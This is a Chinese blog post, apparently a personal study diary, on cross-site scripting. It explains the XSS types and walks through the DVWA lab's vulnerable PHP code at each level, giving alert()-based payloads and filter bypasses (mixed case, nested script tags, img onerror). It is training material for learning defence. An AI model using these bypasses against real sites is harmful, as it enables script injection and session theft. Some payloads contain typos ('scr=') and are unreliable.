Web安全 学习日记7 - XSS(跨站脚本攻击)

已于 2023-04-05 20:15:02 修改
阅读量320 收藏
点赞数
分类专栏: Web安全 文章标签: web安全 学习 xss
于 2023-03-12 20:19:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/129408742
版权

文章目录

何为XSS

  • 跨站脚本攻击XSS(Cross Site Script)
  • 攻击者在web页面插入恶意代码,当用户访问该页面时,恶意代码就会被执行,从而达到攻击用户的目的

XSS存在原因

  • 对 url 或者 提交给 web服务器的内容 没有进行充分过滤

XSS危害

 							|--->窃取cookie
							|--->网络钓鱼
		|------->针对用户-->|--->放马挖矿	
		|					|--->广告刷流量
 XSS----|					
		|					
		|					|--->篡改页面
		|----->针对web服务->|--->传播蠕虫
							|--->内网扫描
							|--->劫持后台
							
 从以上我们可以知道,存储型的XSS危害最大。因为他存储在服务器端,所以不需要我们和被攻击者有任何接触,
 只要被攻击者访问了该页面就会遭受攻击。而反射型和DOM型的XSS则需要我们去诱使用户点击我们构造的恶意的URL,
 需要我们和用户有直接或者间接的接触,比如利用社会工程学或者利用在其他网页挂马的方式。

XSS分类

  • 反射型XSS(非持久型)
  • 存储型XSS(持久型)
  • DOM型XSS
1、反射型XSS

特点:

  • XSS攻击代码非持久性,也就是没有保存在web服务器中,而是出现在URL地址中
  • 一般是攻击者通过邮件,聊天软件等等方式发送攻击URL,然后用户点击来达到攻击的

流程: 黑客利用社会工程学的方法,让用户点击带有XSS恶意脚本的url,用户点击后访问了正常的服务器,服务器将恶意脚本弹回给了用户浏览器,用户浏览器解析并执行恶意代码,向恶意服务器发起请求,于是黑客便可以获取用户的Cookie等信息。
在这里插入图片描述

2、存储型XSS

特点:

  • XSS攻击代码存储于web服务器数据库中
  • 攻击者一般是通过网站的留言、评论、博客、日志等等功能将攻击代码存储到web服务器上的

流程: 黑客在正常服务器上构造XSS脚本,并存储在正常服务器数据库中,其他用户访问正常服务器下存在恶意脚本的页面时,正常服务器会将恶意脚本弹回给用户浏览器,用户浏览器解析并执行恶意代码,向恶意服务器发起请求,于是黑客便可以获取用户的Cookie等信息。
在这里插入图片描述

3、DOM型XSS

DOM 全称为 文档对象模型(Document Object Model)。这种DOM型与反射型、存储型有着本质的区别,它的攻击代码不需要服务器解析响应,而是依靠的是浏览器端的DOM解析。攻击者利用客户端的JavaScript脚本访问浏览器的DOM并修改页面的内容,不依赖服务器的数据,直接从浏览器端获取数据并执行。

XSS的简单绕过WAF

----------------------------------
 1.区分大小写过滤标签:
	  过滤:$name=preg_replace("/<script>/","",$name);      //过滤<script>
			$name=preg_replace("/<\/script>/","",$name);   //过滤</script>
	  绕过:可以使用大小写绕过  <scripT>alert('hack')</scripT>
----------------------------------
 2.不区分大小写过滤标签:/i:不区分大小写
	  过滤:$name=preg_replace("/<script>/i","",$name);    //不区分大小写过滤 <script>
			$name=preg_replace("/<\/script>/i","",$name);  //不区分大小写过滤 </script>
	  绕过:可以使用嵌套的script标签绕过:<scr<script>ipt>alert('hack')</scr</script>ipt>
---------------------------------- 
 3.不区分大小写,过滤之间的所有内容:
	  过滤:$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); //过滤了<script  及其之间的所有内容
	  绕过:虽然无法使用<script>标签注入XSS代码,但是可以通过img、body等标签的事件
			或者iframe等标签的 rc注入恶意的js代码。
			<img scr=1 onerror=alert("xss")>
------------------------------------

DVWA 反射型XSS

1、Low

查看源码: 没有做任何防护

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

构造payload:

<script>alert("xss")</script>
2、Medium

查看源码: 使用了 str_replace() 函数,将 

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

绕过:

  • 大小写绕过
  • 双写绕过

构造payload:

// payload one
<ScrIpt>alert("xss")</ScrIpt>

// payload two
<sc<script>ript>alert("xss")</script>
3、High

查看源码: 使用了 preg_replace() 函数,将任何模式的 script 都过滤了

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

绕过:

  • 使用其他标签

构造payload:

<img src=1 onerror=alert("xss")>
4、Impossible

查看源码:

  • 使用 checkToken() 验证 token ,防范 CSRF 攻击。
  • 使用 htmlspecialchars() 函数把预定义的字符&、”、 ’、<、>转换为 HTML 实体,防止浏览器将其作为HTML元素
<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

DVWA 存储型XSS

0、相关函数介绍
htmlspecialchars() 		// 把预定义的字符&、”、 ’、<>转换为 HTML 实体,防止浏览器将其作为HTML元素

trim(string,charlist)	// 移除 string 两侧的空格或其他预定义字符,可选参数charlist支持添加额外需要删除的字符。

mysql_real_escape_string(string,connection)		// 函数会对字符串中的特殊符号(\x00,\n,\r,\,',",\x1a)进行转义。

stripslashes(string)	// 删除 string 中的反斜杠
1、Low

查看源码: 虽然使用 trim 去掉空格,使用 stripslashes 去掉反斜杠,使用 mysql_real_escape_string 转义特殊字符,但是这些对我们的 根本不起作用(含的是斜杠,不是反斜杠),所以整个代码没有对 XSS 做任何防护

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );	// 去掉空格
    $name    = trim( $_POST[ 'txtName' ] );		// 去掉空格

    // Sanitize message input
    $message = stripslashes( $message );	// 去掉反斜杠
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));	// 特殊字符转义

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));	// 特殊字符转义

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

构造payload:

Name = 1
Message = <script>alert("xss")</script>
2、Medium

查看源码:

  • 使用了 htmlspecialchars() 函数,将 $message 中的预定义字符转换为了HTML实体,防止其作为HTML元素
  • 使用了 str_replace() 函数,将 $name 中的 
<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );			// 将 $message 中的预定义字符转换为HTML实体

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );		// 将 $name 中的 <script> 标签替换为空
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));	// 将 $name 中的 <script> 标签替换为空

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

绕过:

  • 这时 $message 不存在XSS漏洞,而 $name 可以绕过,但发现 $name 限制了输入长度,于是可以用 burpsuite 抓包改造 $name
  • 大小写绕过
  • 双写绕过

构造payload:

// payload one
Name = <ScrIpt>alert("xss")</ScrIpt>
Message = 1

// payload two
Name = <sc<script>ript>alert("xss")</script>
Message = 1
3、High

查看源码:

  • 使用了 htmlspecialchars() 函数,将 $message 中的预定义字符转换为了HTML实体,防止其作为HTML元素
  • 使用了 preg_replace() 函数,将任何模式的 script 都过滤了
<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );		// 将 $message 中的预定义字符转换为HTML实体

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );		// 将 $name 中任何模式的 script 都过滤
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

绕过:

  • 这时 $message 不存在XSS漏洞,而 $name 可以绕过,但发现 $name 限制了输入长度,于是可以用 burpsuite 抓包改造 $name
  • 使用其他标签绕过

构造payload:

Name = <img scr=0 onerror=alert("xss")>
Message = 1
4、Impossible

查看源码:

  • 使用 checkToken() 验证 token ,防范 CSRF 攻击。
  • 使用 htmlspecialchars() 函数把预定义的字符&、”、 ’、<、>转换为 HTML 实体,解决了XSS所以无法注入
<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

DVWA DOM型XSS

1、Low

查看源码: 没有做任何防护

<?php

# No protections, anything goes

?>

构造payload:

<script>alert("xss")</script>
2、Medium
使用stripos对"<script"进行过滤,并且不区分大小写,如果有则置为English
	 1.此时查看源码:
	 <select name="default">
		<option value="" disabled="disabled">----</option>
		<option value="English">English</option>
		<option value="French">French</option>
		<option value="Spanish">Spanish</option>
		<option value="German">German</option>
		<input value="Select" type="submit">
	</script>
	2.输入的值会在value中显示,直接<script>alert("x");</script>被过滤,换用标签
		使用payload:<img src=1 onerror=alert("xss")>
		此时:
			<option value="%3Cimg%20src=1%20οnerrοr=alert(%22xss%22)%3E"></option>
			<option value="" disabled="disabled">----</option>
			<option value="English">English</option>
			<option value="French">French</option>
			<option value="Spanish">Spanish</option>
			<option value="German">German</option>
			</select>
		发现标签未被显示,接着想办法闭合标签<select><select>让我们的payload加载到html
		中能被执行:</option></select><img src=1 onerror=alert("xss")>
		当然也可直接闭合<select>:payload:</select><img src=1 onerror=alert("xss")>

构造payload:

</ select><img src=1 οnerrοr=alert(“xss”)>
3、High
这里high级别的代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的

相应值,如果不匹配,则插入的是默认的值。此时,在URL中添加注释#注释的内容不会提交到服务器,而是在浏览器执行:

尝试English#< script >alert(“x”);

构造payload:

English#<script>alert("x");
4、Impossible
当我们尝试注入时,我们注入的内容都会经过URL编码显示在输入框,经过URL编码的内容被放在HTML标签中,而没有经过解码。所以不存在注入。

XSS防御

1、对输入的内容进行过滤
2、对输出进行HTML编码
Ch4ser
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全技术-实验七、跨站脚本攻击xss)(反射型).doc
08-20
web安全技术-实验七、跨站脚本攻击xss)(反射型)
记录一次XSS跨站脚本攻击
qq_42271561的博客
04-13 835
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 问题 首先这个平台是一个物流园的门户网站,网站有一些相关的实时新闻和其他站点的友情链接。 这是当时他们网安部门的漏洞.
跨站脚本攻击(XSS)
前行的博客
08-15 764
概念 XSS攻击,通常指通过'HTML注入'篡改了网页,插入恶意脚本,大多数是javascript或者指向脚本的链接,在用户浏览网页的时候,控制用户浏览器的一种攻击。主要的攻击对象是当前用户的个人信息。 对于XSS攻击者来说,JavaScript工作在渲染后的浏览器环境中,无法控制用户浏览器发出的HTTP头。 XSS的三种类型 反射型XSS:特点是黑客需要诱使用户点击一个恶意链...
WEB脚本攻击
04-18
B/S时代到来,web安全变得越来越重要!
Web 安全XSS 攻击
qq_43645678的博客
11-22 762
Web 安全XSS 攻击
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击-运维安全详细笔记
36-36.XSS跨站脚本攻击课程介绍.mp4
05-10
36-36.XSS跨站脚本攻击课程介绍.mp4
XSS跨站脚本攻击
01-27
跨站脚本(crosssitescript)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用网站没有对用户提交数据...
40-40.XSS跨站脚本攻击植入方式.mp4
05-10
40-40.XSS跨站脚本攻击植入方式.mp4
Web漏洞-Xss跨站
weixin_70557959的博客
05-05 661
[草稿] XSS跨站 发布时间:2022-04-23 21:43:11 作者:weixin_46544151 阅读数:0 标签:web安全,安全,网络安全 文章描述: 25.xss跨站之原理分类及攻击方法 一、本地环境XSS,漏洞原理讲解 在phpstudy中根目录创建1.php <?php $xss=$_GET['x']; echo $xss; ?> 浏览器打开,在网址后输入?x=1,网页输出1 输入?x=<script>alert(1)</script&...
web跨站脚本攻击XSS)与sql注入攻击 实例
a116385895的博客
07-02 3101
免责申明:对于此内容仅是提供参考,用于开发人员针对黑客攻击做好安全防范 XSS攻击: 跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS。但是,由于层叠样式表 (Cascading Style Sheets)的缩写也为CSS,为不与其混淆,特将跨站脚本缩写为XSS。 跨站脚本,顾名思义,就是恶意攻击者利用网站漏洞往Web页面里插入恶意代码,一般需要以下几个条件: 客户端访问的网站是一个有漏洞的网站,但是他没有意识到; 在这个网站中通过一些手段放入一段可以执行的代码,吸引客户
面对网络安全隐患该如何去做呢?
m0_73514785的博客
05-23 673
由于主动式集线器与交换机不通过广播方式进行数据包的转发,嗅探技术也只针对共享式的网络起作用,因此,可以通过交换机的使用,对网络进行分段,最大程度地防止网络技术地攻击,即使受到嗅探技术地入侵,也只能攻击到一部分的信息流。其实伪基站不会连接到运营商的真实网络,它只是自动测量出其所在区域运营商基站所用的广播控制信道频点,然后将测量到的频点和短信内容输入到伪基站的操作平台上,批量群发短信,并且可以在接收方的短信上任意编造主叫号码。开启这些防护设备的网络,可实现对网络层的访问控制,是上网安全的重要保障。
网络安全等级保护2.0(等保)是什么
weixin_45840241的博客
05-20 1072
通俗来讲就是:公司或者单位因为要用互联网,但是网上有坏人,我们不仅要防御外部坏人,还要看看咱的管家、工人(管理人员)保安,有没有不锁门、有没有关灯、有没有乱抽烟乱扔烟头,隔一段时间就对这些进行检查、评比,发现问题抓紧处理改进,确保咱家人和财产的安全,防患于未然。虽说跟人的体检差不多,但是对于企业也是一笔不少支出,那为啥必须要做。测评机构对信息系统等级测评,形成测评报告,全云在线提供等保测评服务,提供阿里云平台的合规资质证明,辅导用户测评整改,整改后,测评机构对系统等级符合性状况进行测评,出具测评报告。
【网络安全】Linux 应急响应-溯源-系统日志排查知识点
weixin_43822401的博客
05-17 426
编辑或;
网络安全相关面试题(hw)
最新发布
XLbb的博客
05-23 1188
7、敏感信息收集,如 github 源码、用 7kb、破壳扫源代码泄露(.hg、.git、cvs、svn、.DS_store 源代码泄露)、google hack、接口信息泄露、社工信息泄露、邮箱地址信息收集、网盘搜索、钟馗之眼、天眼查、威胁情报、微步在线等。3、可以使用 D 盾_web 查杀工具、火绒剑、 XueTr 等工具进行判 断可疑进程(如蓝色、红色进程、没有签名验证信息的进程、没有 描述信息的进程、进程的属主、进程的路径是否合法、 CPU 或内存资源占用长时间过高的进程)
Web安全:SQL注入之时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 1708
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
出海战略中的网络技术应用:SOCKS5代理、代理IP与网络安全
Together_GPT的博客
05-23 342
在全球市场中,SOCKS5代理、代理IP以及全面的网络安全措施,是跨界电商和游戏行业企业实现成功出海的关键技术支柱。通过结合使用加密技术,如SSL/TLS,SOCKS5代理能够为数据传输提供一个安全的隧道,进一步增强数据的保密性和完整性。游戏企业则可以减少游戏延迟,提升玩家的游戏体验。同时,企业还可以根据不同地区的文化和语言特点,定制化地推送内容,提升用户的参与度和满意度。利用SOCKS5代理和代理IP虽然可以在一定程度上增强安全性和隐私保护,但还需要更多的措施来构建全面的网络安全体系。
bugku 网络安全事件应急响应
qq274575499的博客
05-23 835
X集团的WebServer服务器遭到黑客入侵,该服务器的Web应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件和恶意文件等。通过分析黑客的攻击行为,我们将发现系统中的漏洞,并对其进行修复。
网络安全之BGP详解
m0_65858385的博客
05-23 1330
在IBGP协议里邻居关系建立或路由传递时,只能在直连之间传递(大多数用的组播更新,组播更新地址用的是224.0.0.X,而224.0.0.X的地址用的TTL值默认为1,所以不能跨网段传递路由,而BGP为什么行可以跨网段传递,是因为它是基于TCP的,TCP是要进行三次握手的,即只要两个IP之间能相互通信,就能进行三次握手,能够三次握手BGP就能传路由,跟中间传递的路由器没有关系,对于中间的路由器而言,它们只知道传递的是点对点的TCP数据包,而实质上这里面承载着BGP的路由信息)。
xss跨站脚本攻击剖析与防御 (邱永华著)
12-22
XSS跨站脚本攻击是一种常见的Web应用程序安全漏洞,攻击者通过注入恶意脚本代码进入受害者的浏览器,实现对用户数据的窃取、篡改、破坏等恶意行为。在《XSS跨站脚本攻击剖析与防御》这本书中,作者首先深入剖析了XSS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值